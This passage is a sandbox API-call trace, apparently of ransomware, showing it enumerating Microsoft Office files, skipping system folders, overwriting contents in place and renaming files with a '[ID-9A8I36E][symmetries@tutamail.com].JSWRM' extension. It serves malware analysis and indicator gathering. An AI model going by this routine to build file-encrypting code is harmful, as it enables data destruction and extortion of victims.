office\\root\\mcxml\\x-none\\office.x-none.msi.16_common.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_Common.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_common.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.161] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d407, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_licensing.mcxml", cAlternateFileName="OFFICE~3.MCX")) returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2=".") returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="..") returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="...") returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="windows") returned -1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="recovery") returned -1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="perflogs") returned -1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="documents and settings") returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="system volume information") returned -1 [0113.161] lstrcmpiW (lpString1="Office.x-none.msi.16_licensing.mcxml", lpString2="msocache") returned 1 [0113.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_licensing.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0113.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_licensing.mcxml", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_licensing.mcxml", lpUsedDefaultChar=0x0) returned 36 [0113.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0113.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_licensing.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0113.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_licensing.mcxml", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_licensing.mcxml", lpUsedDefaultChar=0x0) returned 36 [0113.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0113.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0113.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0113.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_licensing.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_licensing.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.162] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=316423) returned 1 [0113.162] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.162] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.178] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.178] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.179] CloseHandle (hObject=0x238) returned 1 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0113.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0113.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0113.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0113.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0113.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_licensing.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_licensing.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_licensing.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_licensing.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0113.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0113.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0113.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.180] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128ed2a1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x402c64, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_mondoww.mcxml", cAlternateFileName="OFFICE~1.MCX")) returned 1 [0113.180] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.181] lstrcmpiW (lpString1="Office.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0113.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0113.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.182] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4205668) returned 1 [0113.182] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.182] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.195] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.195] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.196] CloseHandle (hObject=0x238) returned 1 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0113.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0113.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0113.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0113.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.196] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0113.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0113.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0113.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.197] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116bf2cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116bf2cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x116bf2cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_postcommon.mcxml", cAlternateFileName="OFC55B~1.MCX")) returned 1 [0113.197] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2=".") returned 1 [0113.197] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="..") returned 1 [0113.197] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="...") returned 1 [0113.197] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="windows") returned -1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="recovery") returned -1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="perflogs") returned -1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="documents and settings") returned 1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="system volume information") returned -1 [0113.198] lstrcmpiW (lpString1="Office.x-none.msi.16_postcommon.mcxml", lpString2="msocache") returned 1 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_postcommon.mcxml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_postcommon.mcxml", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_postcommon.mcxml", lpUsedDefaultChar=0x0) returned 37 [0113.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_postcommon.mcxml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_postcommon.mcxml", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_postcommon.mcxml", lpUsedDefaultChar=0x0) returned 37 [0113.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0113.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0113.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_postcommon.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.199] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=756) returned 1 [0113.199] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f0) returned 0x20b1f8 [0113.199] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2f0, lpOverlapped=0x0) returned 1 [0113.201] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.201] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2f0, lpOverlapped=0x0) returned 1 [0113.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0113.201] CloseHandle (hObject=0x238) returned 1 [0113.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0113.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0113.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: 